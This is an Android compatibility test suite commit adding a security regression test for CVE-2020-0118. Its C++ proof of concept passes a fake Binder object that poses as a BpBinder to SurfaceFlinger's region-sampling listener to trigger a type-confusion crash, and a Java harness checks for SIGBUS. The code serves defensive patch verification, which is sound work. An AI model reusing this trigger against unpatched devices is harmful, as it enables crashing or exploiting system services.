Merge "[RESTRICT AUTOMERGE] CTS test for Android Security b/150904694" into rvc-dev

3 files changed, 205 insertions, 0 deletions

diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp
new file mode 100644
index 00000000000..967a0b78c7d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+    name: "CVE-2020-0118",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+    ],
+    header_libs: [
+        "libgui_headers",
+        "libsurfaceflinger_headers",
+    ],
+    shared_libs: [
+        "libbinder",
+        "libgui",
+        "liblayers_proto",
+        "libsurfaceflinger",
+        "libutils",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp
new file mode 100644
index 00000000000..b6ce3147128
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp
@@ -0,0 +1,124 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+#include "../includes/common.h"
+#include "SurfaceFlinger.h"
+#include "gui/IRegionSamplingListener.h"
+
+bool testInProgress = false;
+
+struct sigaction new_action, old_action;
+void sigbus_handler(int signum, siginfo_t *info, void *context) {
+  if (testInProgress && info->si_signo == SIGBUS) {
+    (*old_action.sa_sigaction)(signum, info, context);
+    return;
+  }
+  _exit(EXIT_FAILURE);
+}
+
+class NewBinder : public android::IBinder {
+public:
+  constexpr static uint32_t arraySize = 16;
+  constexpr static uint32_t elementValue = 0x11111111;
+  uint32_t arr[arraySize] = {};
+
+  NewBinder() {
+    for (uint32_t i = 0; i < arraySize; ++i) {
+      arr[i] = elementValue;
+    }
+  }
+
+  const android::String16 &getInterfaceDescriptor() const {
+    static android::String16 sEmptyDescriptor;
+    return sEmptyDescriptor;
+  }
+
+  bool isBinderAlive() const { return true; }
+
+  android::status_t pingBinder() { return android::NO_ERROR; }
+
+  android::status_t
+  dump(int /* fd */, const android::Vector<android::String16> & /* args */) {
+    return android::NO_ERROR;
+  }
+
+  android::status_t transact(uint32_t /* code */,
+                             const android::Parcel & /* data */,
+                             android::Parcel * /* reply */,
+                             uint32_t /* flags */) {
+    return android::NO_ERROR;
+  }
+
+  android::status_t linkToDeath(
+      const android::sp<android::IBinder::DeathRecipient> & /* recipient */,
+      void * /* cookie */, uint32_t /* flags */) {
+    return android::NO_ERROR;
+  }
+
+  android::status_t unlinkToDeath(
+      const android::wp<android::IBinder::DeathRecipient> & /* recipient */,
+      void * /* cookie */, uint32_t /* flags */,
+      android::wp<android::IBinder::DeathRecipient> * /* outRecipient */) {
+    return android::NO_ERROR;
+  }
+
+  void attachObject(const void * /* objectID */, void * /* object */,
+                    void * /* cleanupCookie */,
+                    object_cleanup_func /* func */) {}
+
+  void *findObject(const void * /* objectID */) const { return nullptr; }
+
+  void detachObject(const void * /* objectID */) {}
+
+  android::BBinder *localBinder() { return nullptr; }
+
+  android::BpBinder *remoteBinder() {
+    return reinterpret_cast<android::BpBinder *>(this);
+  }
+};
+
+class Listener : public android::BnRegionSamplingListener {
+public:
+  void onSampleCollected(float /* medianLuma */) {}
+};
+
+int main() {
+  sigemptyset(&new_action.sa_mask);
+  new_action.sa_flags = SA_SIGINFO;
+  new_action.sa_sigaction = sigbus_handler;
+  sigaction(SIGBUS, &new_action, &old_action);
+
+  android::sp<Listener> listener = new Listener();
+  FAIL_CHECK(listener);
+
+  const android::Rect sampleArea{100, 100, 200, 200};
+  const android::sp<android::IBinder> &stopLayerHandle = new NewBinder();
+  FAIL_CHECK(stopLayerHandle);
+
+  android::sp<android::SurfaceFlinger> flinger =
+      android::surfaceflinger::createSurfaceFlinger();
+  FAIL_CHECK(flinger);
+
+  android::sp<android::ISurfaceComposer> composer = flinger;
+  testInProgress = true;
+  android::status_t status = composer->addRegionSamplingListener(
+      sampleArea, stopLayerHandle, listener);
+  testInProgress = false;
+  FAIL_CHECK(status == android::NO_ERROR);
+
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java
new file mode 100644
index 00000000000..04c9a05df9f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.runner.RunWith;
+import org.junit.Test;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0118 extends SecurityTestCase {
+
+    /**
+     * b/150904694
+     * Vulnerability Behaviour: SIGBUS in self
+     */
+    @AsbSecurityTest(cveBugId = 150904694)
+    @Test
+    public void testPocCVE_2020_0118() throws Exception {
+        String signals[] = {CrashUtils.SIGBUS};
+        String binaryName = "CVE-2020-0118";
+        AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+        testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+        testConfig.config.setSignals(signals);
+        AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+    }
+}